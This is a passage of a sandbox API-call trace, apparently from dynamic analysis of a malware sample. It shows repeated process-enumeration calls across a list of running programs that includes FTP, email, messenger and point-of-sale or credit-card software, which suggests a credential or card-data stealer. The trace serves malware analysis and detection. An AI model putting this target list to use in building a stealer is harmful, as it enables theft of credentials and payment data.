th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0157.206] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0157.208] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0157.210] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0157.212] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0157.216] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0157.218] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0157.221] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0157.224] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0157.227] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0157.230] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0157.232] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0157.235] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0157.238] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0157.241] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0157.244] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0157.246] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0157.250] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0157.257] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0157.259] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0157.261] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0157.263] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0157.266] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0157.269] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0157.271] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0157.273] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0157.275] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0157.276] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0157.278] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0157.280] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0157.282] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0157.284] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0157.286] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0157.288] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0157.290] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0157.298] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0157.300] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0157.302] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0157.305] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0157.307] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0157.309] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0157.311] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0157.313] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0157.314] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0157.317] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0157.319] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0157.321] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0157.323] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0157.326] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0157.328] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0157.330] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0157.335] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0157.337] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0157.339] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0157.341] Process32Next (in: hSnapshot=0x1b7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0157.342] CloseHandle (hObject=0x1b7c) returned 1 [0157.342] Sleep (dwMilliseconds=0x64) [0157.513] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ecc [0157.527] Process32First (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.529] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0157.530] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0157.532] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0157.534] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0157.536] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0157.537] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0157.539] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0157.541] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0157.542] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.544] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.546] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0157.548] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.550] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.580] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.582] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.584] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.586] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.588] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.590] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0157.592] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0157.594] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0157.596] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0157.599] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.601] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0157.603] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0157.605] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0157.607] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0157.610] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0157.612] Process32Next (in: hSnapshot=0x1ecc, 